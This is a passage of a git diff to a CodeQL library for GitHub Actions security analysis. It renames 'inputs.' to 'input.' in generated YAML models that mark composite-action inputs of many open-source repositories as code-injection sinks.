"input.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "input.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index f335170dc854..db98f8d769af 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file + - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 555fa42a79cc..7607840dbdc7 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 8fd9440729f6..2fa4f8dfa618 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index f9479e11aabf..80725157e338 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 711eabc2bfa5..9d317f14272c 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 745f89d8677b..12deff387bdc 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] - - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file + - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index a732e2fac3f0..9c3c242b1ed9 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 1aebd1199a5a..4aa1ce5c4cf9 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file + - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 708adf528f29..6f8ef16ea330 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file + - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 18c02da44431..bc2146921efe 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.notices-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index c0a44fae7498..eabd3834b1b7 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file + - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index af0f474bfaef..2253e33b950c 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 731ecd5ab1be..bc1eb54056af 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"] - - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"] - - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index ca4dc84bbfc2..842240cfaa20 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file + - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index caa6432efa9e..8ff5ee1e2c0a 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"] - - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"] \ No newline at end of file + - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index a2e78841f692..29c5f793fb24 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"] \ No newline at end of file + - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index fbb76ae46e88..2f12293df0ed 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"] - - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"] - - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file + - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 23d001db673e..83012e513359 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"] - - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file + - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 94c7adf250af..8ca211961948 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 85632a06a75b..7f19fd1f6a6f 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file + - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 9f002168214b..1889fcff1441 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file + - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f1191e5c1c6d..f8243352f455 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"] - - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"] - - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index b0e30669c2ec..bd2015a70964 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index e26f0a886d91..501123a82fe5 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"] \ No newline at end of file + - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 4b40b2fda8a5..1a17e3db2b8c 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index 06b6e37ea1c7..a125a4bfa8c6 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"] \ No newline at end of file + - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index dab53d9d5a37..e8d0cc64792b 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file + - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index ce485e688f25..736c84b68ccf 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file + - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index ab1cac6b6919..acb5d462d15a 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: sourceModel diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 82d69349e3ae..aedeb4e1023c 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 13a6bfe9233a..0d8afb086c94 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"] \ No newline at end of file + - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 163abb261858..4756acbf306f 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 3be0de433299..a0e4acec75a0 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 2b0b84e172bf..6acfcf9773f5 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index ba213f0363bb..7e0deeea9065 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] - - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index d93b946f3d74..18678fe9ecd2 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"] - - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"] - - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"] \ No newline at end of file + - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 